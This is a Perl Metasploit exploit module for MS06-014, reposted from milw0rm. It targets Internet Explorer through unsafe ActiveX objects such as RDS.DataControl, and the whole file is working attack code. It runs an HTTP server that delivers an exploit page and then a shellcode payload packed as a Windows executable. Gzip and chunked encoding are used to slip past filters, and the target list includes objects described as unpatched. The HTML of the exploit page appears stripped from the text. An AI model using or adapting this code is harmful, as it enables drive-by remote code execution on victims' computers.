# Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (2) ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::ie_createobject; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Internet Explorer COM CreateObject Code Execution', 'Version' => '$Revision: 3753 $', 'Authors' => [ 'H D Moore ', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects. }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winxp', 'win2003' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 4000, 'Keys' => ['-bind'], }, 'Refs' => [ ['MSB', 'MS06-014'] ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic' ], # Patched [ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'], # Not marked as safe [ 'UNKNOWN - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'], # Not marked as safe [ 'UNKNOWN - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'], # Not marked as safe [ 'UNKNOWN - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'], # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'], # These are restricted by site (might be exploitable via DNS spoofing + SSL fun) [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'], [ 'UNKNOWN - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'], # Part of the WMI SDK, currently unpatched/unreported [ 'UNKNOWN - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'], # Visual Studio components, not marked as safe [ 'UNKNOWN - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'], [ 'UNKNOWN - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'], [ 'UNKNOWN - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'], [ 'UNKNOWN - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'], ], 'Keys' => [ 'ie' ], 'DisclosureDate' => '', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10); # Read the HTTP headers my $headers; while ( (my $line = $fd->RecvLine(10))) { $headers .= $line; last if $line eq "\r\n"; } if ($url =~ /\?payload/) { $self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload..."); my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject'); $fd->Send($self->BuildResponse($content, 'application/octet-stream')); $fd->Close; return; } $self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page..."); $fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html')); $fd->Close; return; } sub GenerateHTML { my $self = shift; my $target_idx = $self->GetVar('TARGET'); my $objects = ""; if ($target_idx == 0) { foreach my $target (@{ $self->Targets }) { if ($target->[1]) { $objects .= "'".$target->[1]."',"; } } } else { my $target = $self->Targets->[$target_idx]; $objects .= "'".$target->[1]."',"; } my $data = qq#

Initializing...

#; } sub BuildResponse { my ($self, $content, $type) = @_; $type ||= 'text/plain'; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: $type\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-08-10]